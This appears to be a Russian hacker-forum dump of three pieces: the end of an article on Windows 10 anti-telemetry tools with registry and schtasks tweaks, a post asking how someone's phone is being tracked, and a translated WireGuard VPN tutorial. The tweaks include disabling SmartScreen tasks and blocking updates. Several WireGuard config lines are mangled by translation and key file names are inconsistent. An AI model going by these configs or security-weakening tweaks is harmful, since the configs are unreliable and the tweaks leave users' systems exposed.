Через два дня после использования O&O ShutUp10 полет нормальный и картина в целом радует. Изредка в сетевом трафике проскакивают адреса серверов Microsoft из разных стран. В сборке 1803 с ними общаются в основном backgroundTaskHost, dasHost.exe и svhost (последний держит устойчивое соединение на протяжении всей работы), а в 1709 — только svhost. Кроме того, в сборке 1803 после каждого перезапуска программы отключается параметр «Запретить выполнение приложений в фоновом режиме» (за 1709 такого поведения не замечено) и автоматически восстанавливаются отдельные параметры, которые O&O ShutUp10 ранее выключила или заблокировала. Получается, что Windows 10 1709 она покорила, а вот 1803 ей пока не по зубам.
Возврат настроек прошел безболезненно. Тут и говорить особо не о чем.
К работе самих ОС после использования O&O ShutUp10 никаких нареканий нет. Несколько раз был удивлен более быстрой работой (с нищебродскими ресурсами, выделенными на одну основную и две гостевые ОС, мне это очень сильно заметно).

Disable Win Tracking
https://github.com/10se1ucgo/DisableWinTracking
Disable Win Tracking 3.2.1 — еще одна небольшая и простая утилита со спартанским интерфейсом. Обновилась она в начале года, но про поддержку разных билдов Windows ничего не сказано.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F29.png&hash=fa22fa2213690c5c53d0b8deccff333c)
Disable Win Tracking

INFO
Изначально DiagTrack распространялся как опциональное обновление KB3022345. Этот «шпионский» сервис можно было вообще не устанавливать или удалить штатными средствами, но в конце 2015 года хитрецы из Microsoft переименовали его в Connected User Experiences and Telemetry и зашили в систему как обязательный компонент.
Нажимаем GO, и после завершения нам выдается подробный отчет о проделанной работе. Любопытно полистать и посмотреть, что все же программа делает.
Через три дня теста установились очередные обновления. Служба dmwappushsvc снова появилась в списке, но была в отключенном состоянии. По результатам мониторинга сети: адреса Microsoft и Akamai в логах никуда не делись. Мои операционки регулярно выходили с ними на связь, но трафика стало меньше. На стабильности работы ОС действия Disable Win Tracking никак не отразились, а вот Skype перестал работать. Вмешательства в систему оказались минимальные: добавление правил для встроенного файрвола и несколько правок реестра.

Windows Privacy Dashboard
https://wpd.app/
Последняя утилита, которую хотелось бы разобрать, — WPD 1.2.940. На момент написания статьи текущий релиз был от 11 октября 2018 года, но правила блокировки следящих компонентов в нем использовались от 16 сентября. Заявлена поддержка Windows 10 вплоть до 1809. Функции программы разбиты на три раздела: управление конфиденциальностью, создание правил файрвола и удаление установленных программ («мусор», как их назвали разработчики).
Управление конфиденциальностью отключает правила в планировщике, некоторые службы и вносит изменения в реестр. Правила файрвола создаются исходя из выбранного режима приватности: Spy и Extra. При выборе последнего блокируются OneDrive, Skype, Live и подобное (об этом программа предупреждает). Как и во всех случаях, я постарался выжать из этой утилиты все, кроме удаления приложений.
За четыре дня тестов я не выявил нареканий в работе ОС — обе тестовые операционки работали стабильно. Я доволен программой не меньше, чем O&O ShutUp10. После работы WPD в логах осталось минимальное количество соединений с серверами Microsoft и ее партнеров, а сами пакеты были очень маленькие.
Большую часть изменений WPD вносит в реестр. Вот как выглядит результат ее работы в Windows 1803.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F38.png&hash=6f991b5c024edd939e28c435bad767ec)
Фрагмент изменений в реестре после WPD

Снимки реестра я сравнивал программой Regshot. Перечислять все измененные ключи было бы слишком утомительно. Думаю, что цифра в строке «Удаленные/Новые параметры» говорит сама за себя.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F36.png&hash=70c0bfd819a3b381634732b287a5af67)
Новые ключи реестра

Программа создала одно правило файрвола, прописав в него кучу IP-адресов.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F37.jpg&hash=9c72f2b58ea7807c7e92c1898f21764b)
Правило файрвола

В общем, WPD отработала весьма неплохо.

Отключаем слежку вручную
Давай попробуем сделать вручную часть действий описанных программ. Выполним основные блокировки, о которых я говорил выше. Все действия — на свой страх и риск! Перед редактированием реестра рекомендую создать резервную копию.

Отключаем запись активности пользователя
За это отвечает функция Timeline. Заходим в редактор реестра (regedit), идем по пути HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System. Создаем 32-разрядный DWORD со значением 0 и названием EnableActivityFeed.

Отключаем «кейлоггер»
Речь о той самой службе dmwappushsvc. Идем по ветке HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\dmwappushsvc и присваиваем dmwappushsvc значение 4 (здесь же можно сразу выключить и DiagTrack).

Отключаем телеметрию
Тут надо пояснить, что современные сборки Windows не позволяют полностью отключить телеметрию без потери существенных функций системы. Есть три варианта настройки передачи собранных данных: «Базовая настройка», «Расширенная» и «Полные данные». Еще есть раздел «Безопасность», но он присутствует только в Enterprise. Через реестр мы можем задать минимальный уровень сбора телеметрии: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DataCollection (если параметра DataCollection нет, его нужно создать). Создаем DWORD 32 бит c названием AllowTelemetry и присваиваем ему значение 1.

Отключаем сбор данных о местоположении
Идем по ветке HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{BFA794E4-F964-4FDB-90F6-51056BFE4B44} и присваиваем этому параметру значение Allow.

Отключаем Cortana
В ключе HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Windows Search параметру Allow Cortana присваиваем значение 0.

Отключаем OneDrive
По адресу HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Skydriveнаходим или создаем параметр DisableFileSync типа DWORD 32 бит и присваиваем ему значение 1.

Выключаем отправку телеметрии в планировщике задач
Помимо телеметрии, в планировщике есть куча изначально созданных задач, которые отнимают ресурсы и работают без ведома пользователя. В основном они собирают телеметрические данные для «программы по улучшению пользовательского опыта» и сервиса облачной защиты SmartScreen.
Отключить всю эту богадельню можно следующими командами:
schtasks /Change /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /Disable
schtasks /Change /TN "Microsoft\Windows\Application Experience\ProgramDataUpdater" /Disable schtasks /Change /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /Disable
schtasks /Change /TN "Microsoft\Windows\Autochk\Proxy" /Disable
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /Disable
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /Disable
schtasks /Change /TN "Microsoft\Windows\CloudExperienceHost\CreateObjectTask" /Disable
schtasks /Change /TN "Microsoft\Windows\DiskDiagnostic\Microsoft-Windows- DiskDiagnosticDataCollector" /Disable
schtasks /Change /TN "Microsoft\Windows\Maintenance\WinSAT" /Disable
schtasks /Change /TN "Microsoft\Windows\NetTrace\GatherNetworkInfo" /Disable
schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyMonitor" /Disable
schtasks /Change /TN "Microsoft\Office\OfficeTelemetryAgentFallBack" /Disable
schtasks /Change /TN "Microsoft\Office\OfficeTelemetryAgentLogOn" /Disable

Блокируем отправку данных на серверы Microsoft
В интернете есть множество ресурсов, на которых регулярно обновляют списки адресов «шпионских» серверов Microsoft. К примеру, на [aeronet.cz](https://aeronet.cz/news/analyza-windows-10-ve-svem-principu-jde- o-pouhy-terminal-na-sber-informaci-o-uzivateli-jeho-prstech-ocich-a-hlasu) можно найти основной перечень. Проще всего добавить их в hosts и создать запрещающие правила в файрволе.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F33.png&hash=6b9654ea8d0e4cfe4c6b7725f7ee32d7)
Правила брандмауэра Windows

Я использовал оба метода. На один из заблокированных адресов Windows вышла уже спустя час работы, но размер сетевого пакета оказался нулевым.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F34.png&hash=4bce85e678f6bab2f610224fc069e3e5)
Попытка соединения с заблокированным адресом

Некоторые эксперты по безопасности считают, что системные процессы Windows (включая «шпионские») могут обходить запреты в hosts и во встроенном файрволе. Теоретически блокировку URL в hosts можно обойти прямым обращением по IP, а блокировку IP в программном брандмауэре — через dnsapi.dll и перехват функций создания протоколов на уровне NDIS другими компонентами ядра Windows. Однако в ходе своего мини-эксперимента я не заметил паразитного трафика. После блокировки в hosts и правилами файрвола попытки установить соединение со «шпионскими» серверами продолжались, но исходящие пакеты были нулевыми, а входящих не было вовсе.

Блокируем обновления
На десерт решил показать еще одну небольшую программку, предназначение которой — лишь блокировать обновления (что большинство программ так и не смогли сделать, хотя функция была заявлена). Это StopUpdates10 2.0.32.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F25.jpg&hash=bd498661375ed6c0f772e6df7f84a77f)
StopUpdates10

Интерфейс программы ограничивается одной кнопкой. Нажимаем, перезагружаем, тестируем.
За два дня тестов программа не допустила скачивания обновлений, хотя Windows усердно (и безуспешно) пыталась их найти. Немного раздражали сообщения Windows об ошибке установки компонентов.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F26.png&hash=4e2ca860a64d3d65c7ccc0dc76a85825)
Сообщение об ошибке

После двух дней простоя и десятка перезагрузок я попробовал проверить наличие обновлений вручную, что также закончилось неудачей. В списке установленных были только те обновления, которые успели скачаться до запуска программы.

Выводы
Мы рассмотрели шесть программ для отключения слежки и настроек приватности в актуальных сборках Windows 10. Подобных утилит очень много. Их авторы копируют наработки друг у друга (Fork me on GitHub!), стремясь сделать списки изменяемых параметров и блокируемых адресов как можно больше. Они редко утруждают себя их проверкой (особенно продолжительной), а проблемы с операционкой обычно появляются не сразу после применения твиков. Это бомба замедленного действия.

Развитие большинства «антишпионских» утилит для Windows 10 остановилось в 2016–2017 годах из-за постоянной гонки вооружений. Microsoft часто меняет IP- адреса своих серверов, арендует облачные в Cloudflare и перенаправляет часть трафика в партнерскую сеть Akamai Technologies. По факту ей принадлежит очень динамичный пул айпишников и несколько крупных сетей. Все не успеешь отследить и заблокировать. К тому же один URL часто используется для соединения с разными IP-адресами или многофункциональным сервером, который нужен для нормальной работы других (не «шпионских») компонентов Windows.
Добавить сетевые адреса сборщиков данных Microsoft можно и вручную, просто найдя такие списки на GitHub и профильных форумах. Нужно скачать их, объединить, отредактировать, проверить (самая сложная часть) и только потом применить «сухой остаток». Придется делать очень много рутинной работы, чтобы хоть на какое-то время результат был стабильным. Потом выйдут обновления Windows, добавятся новые сетевые адреса, твой кропотливо созданный список устареет, и все придется начинать сначала.

Из протестированных программ более или менее справились со своей задачей только O&O ShutUp10 и WPD, хотя и их работу сложно назвать идеальной. Часть настроек приватности меняется штатными средствами самой Windows 10, но в интерфейсе отображаются далеко не все настройки. Если утилита умеет изменять какие-то дополнительные и «глубокие» — в ней есть смысл. Просто надо очень аккуратно с ней работать, тщательно выбирать блокируемые параметры и делать бэкапы до их применения.

автор: Роман Вегелин aka 8bit, хакер ру

Отслеживании месторасположения телефона, GEO tagging

ID: 676533bbb4103b69df371964
Thread ID: 113747
Created: 2024-05-02T14:55:48+0000
Last Post: 2024-05-29T14:32:27+0000
Author: Lenovo310
Replies: 12 Views: 2K

Приветствую Вас уважаемые форумчане!
Прошу у Вас консультацию по вопросу возможности отслеживания месторасположения телефона Samsung Galaxy S10 модель SM-G973F/DS. Интересует техническая сторона этого дела.
Об отслеживании физического месторасположения телефонов (и соответственно их абонентов!) в Сети бродит множество баек и мифов и лучше Вас хакеров на этот вопрос пожалуй не ответит никто.
Предыстория:
1. Есть знакомый, обычный нормальный взрослый законопослушный, психически и физически здоровый человек как Вы и я.
2. У человека и его ближайших соседей есть разногласия с одним своим соседом по общей лестничной площадке ведущим шумный незаконопослушный и асоциальный образ жизни. Также у этого соседа есть множество "друзей" обоих полов разных национальностей и разного возраста от 18-и до 60-и лет ведущих такой же беспорядочный образ жизни как и он сам. И у этих "друзей" соответственно есть такие же "друзья". Сменить свое постоянное место жительства человек в силу разных причин пока не может.
4. У человека есть телефон Samsung Galaxy S10 модель SM-G973F/DS которым пользуется только он сам и к нему нет физического доступа посторонних лиц от слова совсем.
5. Человек купил в центральном торговом центре своего родного города в обычном офисе МТС сим-карту и вставил ее в телефон. Некоторое время спустя после установки в телефон этой сим-карты он вдруг стал замечать за собой слежку. Он видит "друзей" соседа и на улицах и в городском транспорте и в магазинах кафе кино ресторанах клубах музеях у которых на смартфонах видно и его месторасположение на электронной карте (по внешнему виду похожую на яндекс-карту) и мессенджеры (по внешнему виду напоминающие телеграмм/ватсап) по которым они в группах переговариваются друг с другом и делятся описанием и месторасположением человека.
6. Человек некоторое время спустя по приглашению переехал на работу в другой регион и город, в том числе и в надежде избавится от назойливой слежки "друзей" которые своим присутствием отравляют человеку жизнь и устраивают ему всевозможные мелкие пакости и бытовой терроризм дискредитируя его в глазах окружающих людей и пороча его репутацию. Однако по пути следования он также на всех маршрутах движения, вокзалах/аэропортах обнаруживал за собой слежку. По прибытии на новое место работы человек сменил сим-карту родного города на местную но того же оператора МТС и история со слежкой повторилась аналогичным образом. Более того поселившись в рабочей общаге к телефону человека с высокой степенью вероятности был получен физический доступ. На работе телефона это почти никак не отразилось за исключением разового случая быстрого разряда батареи во время работы. Также в телефоне при выявлении посторонней переадресации вызовов посредством команд «*#21#» и «##002#» был выявлен и удален"левый" номер переадресации вызовов. Установка антивирусов и детекторов поиска работы "левых" приложений ничего не дала. Также вернувшись через некоторое время спустя с нового места работы в свой родной город и опять сменив сим-карту бывшего места работы на карту родного города но того же оператора МТС в том же торговом центре в том же офисе МТС ситуация со слежкой повторилась.
7. Понимая что телефон Samsung каким-то образом "засвечен" человек решил продать его и сменил его на кнопочный телефон но решил сохранить прежнюю сим- карту карту вставив ее в кнопочный телефон. Судя по некоторому замешательству "друзей" эта мера возымела некоторый успех но не надолго. Телефон снова стал им "виден" хоть и возможно хуже и однажды во время разговора человека со свои родственником в трубке зазвучали сильные помехи глушащие разговор этакий сигнал что смена телефона тебе братан не поможет мы тебя слышим и видим по прежнему.
8. Глядя на происходящее складывается стойкое впечатление что слежка за человеком ведется двумя взаимоподдерживающими методами. Первый - с помощью наружного наблюдения ("друзей" следящих за человеком физически и передающих информацию о нем и по телефону из уст в уста и в мессенджерах кидая точку его геолокации и фото внешнего вида). Второй - кем-то удаленно с какого-то специального оборудования или программы по номеру сим-карты и\или номерам IMEI телефона.

В связи с изложенным у меня такие вопросы к знающим:
1. Может ли оператор МТС (да и пожалуй оператор других сотовых сетей) продающий сим-карту и видящий при ее оформлении паспортные данные владельца каким то образом или самостоятельно отслеживать месторасположение телефона или привлекать к этой работе какого то сотрудника из своей компании? Если да то кто этот специалист по отслеживанию? Где он физически находится и как его найти? На каком оборудовании или программе он работает? Можно ли доказать факт совершения им незаконной слежки? Как привлечь его к ответственности за незаконную слежку? Может ли такой специалист сидеть в каждом населенном пункте?
2. Если слежка производится коррумпированными сотрудниками правоохранительных органов то на каком оборудовании и программах они работают? Может ли оператор сотовой связи каким либо образом подтвердить и доказать факт незаконной прослушки сотрудниками правоохранительных органов?
3. Как избавится от слежки и прослушки телефона если такое вообще возможно.

Настройка VPN с Wireguard с нуля шаг за шагом | + English Version

ID: 676533bbb4103b69df3719a2
Thread ID: 88115
Created: 2023-05-16T12:02:32+0000
Last Post: 2024-02-20T07:02:09+0000
Author: p1t
Prefix: Статья
Replies: 16 Views: 2K

Автор:p1t
Источник: https://xss.is

здравствуйте, я принес вам статью, которую я сделал, когда учился в университете, надеюсь, вы понимаете, что я не русский, надеюсь, вы понимаете ошибки и понимаете мою добрую волю перевести ее, не будучи русским, чтобы она дошла до всех людей xss.

Мы рассмотрим, как настроить VPN с помощью Wireguard. Мы кратко объясним, что такое VPN. Мы настроим Wireguard без использования скриптов, таких как pivpn. Мы настроим Wireguard на Windows, Linux, macOS, Android и IOS. Если вы частное лицо, специалист по кибербезопасности или компания, этот учебник может быть вам интересен. Мы постараемся объяснить, как внедрить службу, используя как можно меньше технических деталей. Мы ожидаем, что это будет быстрее и проще, чем, например, с OpenVPN. Наконец, мы добавим выводы, а также решения распространенных проблем. В настоящее время это руководство по настройке сервера и клиентов с любой операционной системой.

Captura de pantalla de 2023-05-16 12-53-31.png

Что такое VPN?

Виртуальная частная сеть (VPN) - это технология компьютерных сетей, которая обеспечивает безопасное расширение локальной сети (LAN) через общедоступную или неконтролируемую сеть, такую как Интернет. Она позволяет компьютерам в сети отправлять и получать данные через общие или публичные сети так, как если бы это была частная сеть, со всеми функциональными возможностями, политиками безопасности и управления частной сети. Это достигается путем создания виртуального соединения "точка-точка" с использованием выделенных соединений, шифрования или комбинации обоих методов.

Для чего нужна VPN?

Обычные примеры - возможность соединить два или более филиала компании, используя Интернет в качестве связующего звена, позволить членам группы технической поддержки подключаться из дома к компьютерному центру, или позволить пользователю получить доступ к своему домашнему компьютеру из удаленного места, например, из отеля. И все это с использованием инфраструктуры Интернета.

VPN-соединение через Интернет технически является соединением глобальной сети (WAN) между сайтами, но пользователю кажется, что это частное соединение: отсюда и название "виртуальная частная сеть".

Captura de pantalla de 2023-05-16 12-56-43.png

Что такое Wireguard?

Wireguard - это отличная альтернатива другим VPN-продуктам, таким как OpenVPN или IPSec.

wireguard-solo.logo_.png

WireGuard - это чрезвычайно простой, но быстрый и современный VPN, использующий самую современную криптографию. Его цель - быть быстрее, проще, проворнее и полезнее, чем IPsec. Предполагается, что его производительность будет значительно выше, чем у OpenVPN. WireGuard разработан как VPN общего назначения для работы как на встроенных интерфейсах, так и на суперкомпьютерах, и подходит для самых разных условий. Изначально выпущенный для ядра Linux, сейчас он является кросс-платформенным (Windows, macOS, BSD, iOS, Android) и может быть широко развернут. В настоящее время он находится в стадии активного развития, но уже может считаться самым безопасным, простым в использовании и самым простым VPN-решением в отрасли.

Его конфигурация, по сравнению с другими подобными продуктами, действительно проста, подобно тому, как настраивается SSH. Соединение устанавливается посредством обмена открытыми ключами между сервером и клиентом. Подключиться может только тот клиент, у которого есть открытый ключ в конфигурационном файле сервера.

WireGuard заботится о настройке сетевых интерфейсов, таких как wg0 или wg1, которые ведут себя аналогично более типичному интерфейсу eth0. Это позволяет настраивать и управлять интерфейсами WireGuard с помощью обычных инструментов, таких как ifconfig и ip.
_
Настройка WireGuard с помощью графического интерфейса_

Функции

- Все в одном: WireGuard + Web UI
- Простая установка, простота в использовании
- Список, создание, удаление, включение и отключение клиентов
- Отображение QR-кода клиента
- Загрузка файла конфигурации клиента
- Статистика подключенных клиентов
- Поддержка граватара

Скачать графический интерфейс WireGuard
- https://github.com/WeeJeWel/wg-easy

Captura de pantalla de 2023-05-16 13-26-29.png
изображение 1: Wireguard Cliente

Настройка VPN с помощью Wireguard

Начнем с предположения, что у вас есть сервер (либо VPS, Raspberry Pi и т.д.), на котором мы собираемся установить Wireguard. Этот сервер будет иметь дистрибутив на базе Debian, и именно его мы будем использовать для настройки VPN с Wireguard.

Начиная с ядра 5.4 Wireguard присутствует в репозиториях Linux в стабильной версии. В частности, в Ubuntu версии 20.04 мы уже имеем это ядро, однако мы можем установить его в нестабильной версии практически в любой дистрибутив на базе Debian.
Установка Wireguard на сервер

apt install wireguard

Далее мы включаем репозитории EPEL и PowerTools:

Code:Copy to clipboard

 sudo dnf install epel-release


    sudo dnf install dnf-plugins-core


    sudo dnf config-manager --set-enabled powertools

Затем включите репозиторий Wireguard:

Code:Copy to clipboard

 sudo dnf copr enable jdoss/wireguard

    sudo dnf install wireguard-dkms wireguard-tools

Настройка интерфейса сервера

Теперь, когда Wireguard установлен, мы приступим к подготовке интерфейса. Для этого с помощью команды cd перейдем по следующему пути:

Code:Copy to clipboard

 cd /etc/wireguard/

Здесь мы сгенерируем нашу пару открытого и закрытого ключей следующим образом:

Code:Copy to clipboard

umask 077

Code:Copy to clipboard

wg genkey | tee server_private.key | wg pubkey > server_public.key

С помощью команды ll мы можем проверить, что открытый и закрытый ключи были созданы. Теперь в целях безопасности мы изменим разрешение доступа к ключам так, чтобы доступ к ним имел только пользователь root. Таким образом, если сервер будет взломан, они не смогут выдать себя за нас и направить трафик на другой сервер, отличный от того, который мы создали. Мы сделаем это следующим образом:

Code:Copy to clipboard

chmod 600 -R ../wireguard/

Создаем наш конфигурационный файл:

Code:Copy to clipboard

 touch wg0.conf

Находясь в пути, мы скопируем и вставим наш закрытый ключ из командной строки. Мы также можем скопировать и вставить его щелчком мыши, но этот способ сэкономит нам немного времени:

Code:Copy to clipboard

cat server_private.key >> wg0.conf

Редактирование файла wg0.conf

Переходим к редактированию конфигурационного файла. Я буду использовать Nano, но вы можете использовать любой текстовый редактор, который вам нравится:

Code:Copy to clipboard

nano wg0.conf

Сразу же откроется редактор, и мы увидим, что наш приватный ключ уже находится внутри (помните, что мы скопировали и вставили его ранее командой cat wg private.key >> wg0.conf). Теперь мы отредактируем файл и оставим его в таком виде:

Code:Copy to clipboard

[Interface]
    Адрес = 10.0.0.1
    PrivateKey = Здесь находится ваш закрытый ключ
    ListenPort = 51820
    PostUp = iptables -A FORWARD -i %i -j ACCEPT; iptables -A FORWARD -o %i -j ACCEPT; iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    PostDown = iptables -D FORWARD -i %i -j ACCEPT; iptables -D FORWARD -o %i -j ACCEPT; iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE

Пошаговое объяснение раздела [Интерфейс]

- "Address" - это адрес в VPN, вы можете дать ему тот, который хотите, лишь бы он не был занят. По этому адресу создается VPN сеть, вы можете использовать тот, который есть у меня. У каждого клиента он должен быть свой, то есть, если сервер - 10.0.0.1, то клиент будет 10.0.0.2.

- "PrivateKey" - это ваш закрытый ключ, помните, что он был скопирован и вставлен ранее.

- "ListenPort" - порт, на котором будет работать Wireguard. Важно, по умолчанию 51820 UDP является портом, на котором работает эта VPN, но это может быть любой другой порт. Вы должны открыть его в вашем модеме, чтобы услуга работала.

- "PostUp" и "PostDown" - это правила брандмауэра. Они нужны только в том случае, если у вас есть правила Iptables (а они должны быть). Вы можете скопировать и вставить их, но вы должны знать интерфейс, т.е. мой - eth0, но ваш может иметь другое имя. Вы можете легко проверить это в терминале с помощью команды ifconfig.

Когда наш файл уже отредактирован с помощью nano, нажмите Ctrl O, чтобы сохранить его, и Ctrl X, чтобы закрыть его. Мы собираемся активировать Wireguard для начала работы с системой:

Ctrl X, чтобы закрыть его. Давайте включим Wireguard для загрузки вместе с системой:

Code:Copy to clipboard

systemctl enable wg-quick@wg0

Запускаем службу, проверяем, что она активна и что интерфейс создан (сначала одна команда, затем другая):

Code:Copy to clipboard

systemctl start wg-quick@wg0

Code:Copy to clipboard

systemctl status wg-quick@wg0

Важное замечание о переадресации.

Будьте осторожны с этим, так как это может занять много времени. Нам нужно, чтобы переадресация была включена:

Code:Copy to clipboard

 sysctl -w net.ipv4.ip_forward=1

Если вы используете менеджер брандмауэра UFW, включите порты следующим образом:

Code:Copy to clipboard

ufw allow 22/tcp

Code:Copy to clipboard

ufw allow 51820/udp

Code:Copy to clipboard

 ufw enable

Это важно для того, чтобы иметь доступ в интернет. Если после настройки службы этого не происходит, проверьте путь /etc/sysctl.d и файл 99-sysctl.conf. Откройте его с помощью nano и найдите следующие строки:

Code:Copy to clipboard

# Откомментируйте следующую строку, чтобы включить пересылку пакетов для IPv4.

    #net.ipv4.ip_forward=1

Обратите внимание, что здесь говорится: "Откомментируйте следующую строку, чтобы включить пересылку пакетов для IPv4". Просто удалите # из строки, где написано net.ipv4.ip_forward=1, сохраните с помощью Ctrl O и выйдите. Теперь у вас должен быть доступ в интернет.
Настройка клиента Wireguard в Windows

Wireguard является кроссплатформенным. Он работает на Linux, Windows, MacOS, Android и IOS. Я собираюсь показать вам, как настроить все устройства в качестве клиентов. Давайте посмотрим, как настроить клиент Wireguard на Windows 10.

С компьютера под управлением Windows заходим на сайт Wireguard и скачиваем программу для Windows. Устанавливаем ее и даем ей права администратора. Затем в разделе Add Tunnel нажимаем на Add empty tunnel и заполняем данные, как показано на изображениях. Открытый и закрытый ключи уже автоматически сгенерированы программой

- Нажмите "Добавить туннель", а затем "Добавить пустой туннель".
- Заполните данные, как показано на изображении. Важно: открытый и закрытый ключи автоматически генерируются программой.

Настройка сервера для добавления клиента Windows.

Снова внутри нашего Linux-сервера и по пути /etc/wireguard/ мы изменим файл wg0.conf. Мы сделаем это следующим образом:

Code:Copy to clipboard

 nano wg0.conf

Добавьте раздел Peer в разделе Interface, и он будет выглядеть следующим образом:

Code:Copy to clipboard

[Interface].

    Адрес = 10.0.0.1

    PrivateKey = Здесь находится ваш закрытый ключ

    ListenPort = 51820

    PostUp = iptables -A FORWARD -i %i -j ACCEPT; iptables -A FORWARD -o %i -j ACCEPT; iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

    PostDown = iptables -D FORWARD -i %i -j ACCEPT; iptables -D FORWARD -o %i -j ACCEPT; iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE

    [Peer]

    Publickey = ПУБЛИЧНЫЙ КЛЮЧ, СОЗДАННЫЙ ВАШИМ КЛИЕНТОМ WINDOWS

    РазрешенныеIPs =10.0.0.2/32

    PersistentKeepAlive = 25

Мы добавили peer (наш клиент) с его публичным ключом, ранее сгенерированным в клиенте windows (помните, что он был сгенерирован автоматически при добавлении туннеля). У нас также есть IP 10.0.0.2, который соответствует клиенту. Наконец, строка PersistentKeepAlive = 25 - это отправка пакета каждые 25 секунд, что и рекомендует Wireguard.

Перезапустите службу и проверьте, что клиент был создан:

Code:Copy to clipboard

systemctl restart wg-quick@wg0

Зайдя в клиент Windows, нажмите на кнопку "Активировать", и вы готовы к работе.

Настройка VPN с Wireguard на IOS и Android

В качестве клиентов Wireguard могут выступать смартфоны и мобильные телефоны с IOS и Android. Мы покажем вам, как их настроить.

Из командной консоли нашего сервера, получив повышенные привилегии пользователя root, переходим по пути /etc/wireguard. Помните, что для этого мы используем команду cd /etc/wireguard.

Мы собираемся создать каталог для клиентов IOS и Android. Переместимся в эту папку:

Code:Copy to clipboard

mkdir mobile_clients

Code:Copy to clipboard

cd mobile_clients

В нашем случае мы будем использовать только одно мобильное устройство, поэтому я не буду создавать дополнительные папки. Если вы хотите быть аккуратными, вы можете создать папку для каждого мобильного телефона, который вы хотите использовать в качестве клиента.

Сгенерируем открытый и закрытый ключи для мобильного клиента:

Code:Copy to clipboard

wg genkey | tee clientemovil_private.key | wg pubkey > clientemovil_public.key

Создайте конфигурационный файл для мобильного клиента:

Code:Copy to clipboard

touch clientemovil.conf

Отправляем в конфигурационный файл закрытый ключ нашего мобильного клиента, а также открытый ключ нашего сервера с помощью следующих команд:

Code:Copy to clipboard

cat clientemovil_private.key > clientemovil.conf

Code:Copy to clipboard

cat ../../servidor_public.key >> clientemovil.conf

Теперь с помощью nano clientemovil.conf мы собираемся отредактировать конфигурационный файл. Помните, что первая строка внутри файла - это закрытый ключ мобильного клиента. Вторая строка - это открытый ключ нашего сервера. Предыдущими командами мы скопировали их, и поэтому они находятся внутри. Теперь мы оставляем файл в таком виде:

Code:Copy to clipboard

 [Interface]. 

    Адрес = 10.0.0.4 

    PrivateKey = ВАШ ПРИВАТНЫЙ КЛЮЧ МОБИЛЬНОГО КЛИЕНТА

    ListenPort = 51820 

    [Peer] 

    Publickey = ПУБЛИЧНЫЙ КЛЮЧ ВАШЕГО СЕРВЕРА

    Конечная точка = ВАШ ПУБЛИЧНЫЙ IP:51820

    AllowedIPs = 0.0.0.0.0/0 

    PersistentKeepAlive = 25

Настройка VPN с Wireguard, добавление мобильного клиента на сервер.

Теперь перейдем к конфигурационному файлу сервера и скопируем в него открытый ключ мобильного клиента. Будьте внимательны, чтобы правильно выполнить эту команду, так как вы можете удалить содержимое конфигурационного файла сервера:

Code:Copy to clipboard

cat mobile_client_public.key >> /etc/wireguard/wg0.conf

Теперь отредактируйте файл конфигурации сервера с помощью nano:

Code:Copy to clipboard

nano /etc/wireguard/wg0.conf

В конце файла будет находиться открытый ключ нашего мобильного клиента, мы оставляем конфигурационный файл в таком виде:

Code:Copy to clipboard

[Interface] [Интерфейс

    Адрес = 10.0.0.1

    PrivateKey = Здесь находится ваш закрытый ключ

    ListenPort = 51820

    PostUp = iptables -A FORWARD -i %i -j ACCEPT; iptables -A FORWARD -o %i -j ACCEPT; iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

    PostDown = iptables -D FORWARD -i %i -j ACCEPT; iptables -D FORWARD -o %i -j ACCEPT; iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE

    [Peer]

    PublicKey = ПУБЛИЧНЫЙ КЛЮЧ, созданный вашим клиентом WINDOWS

    Разрешенные IP = 10.0.0.2/32

    PersistentKeepAlive = 25

    [Peer]

    PublicKey = ПУБЛИЧНЫЙ КЛЮЧ ВАШЕГО КЛИЕНТА LINUX

    Разрешенные IP = 10.0.0.3/32

    PersistentKeepAlive = 25

    [Peer] 

    PublicKey = ПУБЛИЧНЫЙ КЛЮЧ ВАШЕГО МОБИЛЬНОГО КЛИЕНТА 

    Разрешенные IP = 10.0.0.4/32 

    PersistentKeepAlive = 25

Перезапустите Wireguard и проверьте, что мобильный клиент разрешен:

Code:Copy to clipboard

 systemctl restart wg-quick@wg0

Генерация QR-кода с помощью Qrencode.

Qrencode - это программа, которая позволяет нам генерировать QR-код из командной строки. Мы устанавливаем ее следующим образом:

Code:Copy to clipboard

 apt install qrencode

Мы генерируем наш QR-код для сканирования с помощью устройства Android или IOS.

Code:Copy to clipboard

 qrencode -t ansiutf8 < clientemovil.conf

**
Рекомендации**
https://github.com/pirate/wireguard-docs

